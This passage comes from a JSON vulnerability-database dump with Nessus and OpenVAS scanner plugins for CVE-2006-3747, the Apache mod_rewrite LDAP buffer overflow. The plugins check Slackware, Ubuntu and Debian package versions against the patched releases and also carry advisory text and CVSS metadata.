audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\nif (slackware_check(osver:\"8.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\nif (slackware_check(osver:\"9.0\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\nif (slackware_check(osver:\"9.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\nif (slackware_check(osver:\"10.0\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\nif (slackware_check(osver:\"10.1\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\nif (slackware_check(osver:\"10.2\", pkgname:\"mod_ssl\", pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"apache\", pkgver:\"1.3.37\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"mod_ssl\", 
pkgver:\"2.8.28_1.3.37\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:45:00", "description": "Mark Dowd discovered an off-by-one buffer overflow in the mod_rewrite\nmodule's ldap scheme handling. On systems which activate\n'RewriteEngine on', a remote attacker could exploit certain rewrite\nrules to crash Apache, or potentially even execute arbitrary code\n(this has not been verified).\n\n'RewriteEngine on' is disabled by default. Systems which have this\ndirective disabled are not affected at all.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : apache2 vulnerability (USN-328-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-prefork-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-perchild", "p-cpe:/a:canonical:ubuntu_linux:apache-ssl", "p-cpe:/a:canonical:ubuntu_linux:apache", "p-cpe:/a:canonical:ubuntu_linux:apache-dev", "cpe:/o:canonical:ubuntu_linux:5.04", "p-cpe:/a:canonical:ubuntu_linux:libapr0", "p-cpe:/a:canonical:ubuntu_linux:apache-common", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork", "p-cpe:/a:canonical:ubuntu_linux:libapr0-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2", "p-cpe:/a:canonical:ubuntu_linux:apache-dbg", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-threadpool", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker", 
"p-cpe:/a:canonical:ubuntu_linux:apache-perl", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:apache2-threaded-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-doc", "p-cpe:/a:canonical:ubuntu_linux:apache2-common", "p-cpe:/a:canonical:ubuntu_linux:apache2-utils", "p-cpe:/a:canonical:ubuntu_linux:libapache-mod-perl", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "p-cpe:/a:canonical:ubuntu_linux:apache-doc"], "id": "UBUNTU_USN-328-1.NASL", "href": "https://www.tenable.com/plugins/nessus/27907", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-328-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27907);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:33:01\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"USN\", value:\"328-1\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : apache2 vulnerability (USN-328-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mark Dowd discovered an off-by-one buffer overflow in the mod_rewrite\nmodule's ldap scheme handling. On systems which activate\n'RewriteEngine on', a remote attacker could exploit certain rewrite\nrules to crash Apache, or potentially even execute arbitrary code\n(this has not been verified).\n\n'RewriteEngine on' is disabled by default. 
Systems which have this\ndirective disabled are not affected at all.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/328-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-perchild\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-threadpool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-prefork-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-threaded-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache-mod-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-common\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-doc\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-mpm-threadpool\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"apache2-utils\", 
pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapr0\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapr0-dev\", pkgver:\"2.0.53-5ubuntu5.6\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-common\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-doc\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-mpm-threadpool\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"apache2-utils\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapr0\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapr0-dev\", pkgver:\"2.0.54-5ubuntu4.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-common\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-dbg\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-dev\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-doc\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-perl\", 
pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache-ssl\", pkgver:\"1.3.34-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-common\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-doc\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-utils\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache-mod-perl\", pkgver:\"1.29.0.4-2ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapr0\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapr0-dev\", pkgver:\"2.0.55-4ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache / apache-common / apache-dbg / apache-dev / apache-doc / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:44:40", "description": "Mark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. 
In some situations a\nremote attacker could exploit this to execute arbitrary code.", "edition": 26, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1132-1 : apache2 - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:apache2"], "id": "DEBIAN_DSA-1132.NASL", "href": "https://www.tenable.com/plugins/nessus/22674", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1132. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22674);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"CERT\", value:\"395412\");\n script_xref(name:\"DSA\", value:\"1132\");\n\n script_name(english:\"Debian DSA-1132-1 : apache2 - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. 
In some situations a\nremote attacker could exploit this to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=380182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1132\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 package.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 2.0.54-5sarge1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", 
\"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"apache2\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-common\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-doc\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-mpm-perchild\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-mpm-prefork\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-mpm-threadpool\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-mpm-worker\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-prefork-dev\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-threaded-dev\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache2-utils\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapr0\", reference:\"2.0.54-5sarge1\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapr0-dev\", reference:\"2.0.54-5sarge1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:49:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update to apache2\nannounced via advisory DSA 
1132-1.\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:57200", "href": "http://plugins.openvas.org/nasl.php?oid=57200", "type": "openvas", "title": "Debian Security Advisory DSA 1132-1 (apache2)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1132_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1132-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 2.0.54-5sarge1.\n\nFor the unstable distribution (sid) this problem will be fixed shortly.\n\nWe recommend that you upgrade your apache2 package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201132-1\";\ntag_summary = \"The remote host is missing an update to apache2\nannounced via advisory DSA 1132-1.\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. In some situations a\nremote attacker could exploit this to execute arbitrary code.\";\n\n\nif(description)\n{\n script_id(57200);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-3747\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1132-1 (apache2)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"apache2-doc\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-threadpool\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-common\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-perchild\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-prefork\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-mpm-worker\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-prefork-dev\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-threaded-dev\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"apache2-utils\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapr0-dev\", ver:\"2.0.54-5sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += 
res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:51:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-209-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:57168", "href": "http://plugins.openvas.org/nasl.php?oid=57168", "type": "openvas", "title": "Slackware Advisory SSA:2006-209-01 Apache httpd", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_209_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are 